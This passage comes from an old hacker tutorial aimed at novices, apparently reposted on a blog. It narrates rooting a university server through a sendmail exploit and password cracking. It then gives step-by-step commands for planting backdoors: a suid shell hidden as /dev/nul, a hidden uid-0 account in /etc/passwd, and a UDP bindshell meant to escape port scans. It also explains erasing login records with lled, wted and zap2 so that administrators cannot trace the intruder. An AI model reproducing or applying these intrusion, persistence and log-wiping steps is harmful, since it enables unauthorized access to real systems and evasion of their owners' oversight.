sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)
There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.
Remember to avoid uploading it with FTP as you can.
Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.
sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu
login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$
Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!
The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.
I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.
To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).
Of course, I haven't listed all the exploit kinds that exist, only the most common.
Putting backdoors
~~~~~~~~~~~~~~~~~
Ok, we've rooted the system. Then what?
Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.
Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.
REMEMBER: ask for permission first!
No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)
Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.
So now we're root and we can do everything, we shall put some backdoors that let us get back in.
It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)
Anyway, i'll explain the basics of it.
1.How to make a sushi:
To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:
sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.
We've finished our 'duty', let's logout:
sh-2.03$ exit
Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
We're superluser again!
There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
Do you know where to get sash from? From my site :-). (www.3b0x.com)
2.How to add fake lusers.
You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.
This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell
When uid=0 and gid=0, that luser gets superluser priviledges.
Then we add a line like this:
dood::0:0:dood:/:/bin/sh (put it in a hidden place)
So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood
And now we're root because dood's uid=0 and gid=0.
Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.
I haven't got such a program at my site, but it shouldn't be difficult to develope.
3.How to put a bindshell.
A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:
If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.
You can get an UDP bindshell coded by !hispahack from my site.
Cleaning up
~~~~~~~~~~~
Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.
So, what will be displayed when luser logsin again?
Last login: Sun Sep 24 10:32:14 from
Then luser writes a mail to the admin:
"It has happen some strange thing, when I loggedin today, I've read a line like this:
Last login: Sun Sep 24 10:32:14 from
Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."
The admin responds to luser:
"That wasn't a bug! this line means someone acceded the system using your password, don't
worry for that, we got his IP. That means we can ask his ISP what phone number did call
at 10:32 and get
So you'll get busted because luser was a bit clever (sometimes happens).
So we gotta find a way to delete that.
This information can be stored in:
/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
and we can erase it using lled (get it from my site)
lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.
There is also some information we'd like to erase:
Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.
The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?
sh-2.03$ who
root tty1 Sep 25 18:18
Then we shall use zap2. If you loggedin as 'luser', then type:
sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$
And luser has never been here.
Greetings
~~~~~~~~~
Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you
decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)
for more advanced tutorials so you can improve your skills.
I'd get very happy if you send me a mail telling me your impression about this paper (wether
is good or bad), and you help me to improve it.
I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups
or other tutorials like this one. thanks to all.
Subscribe to:
Posts (Atom)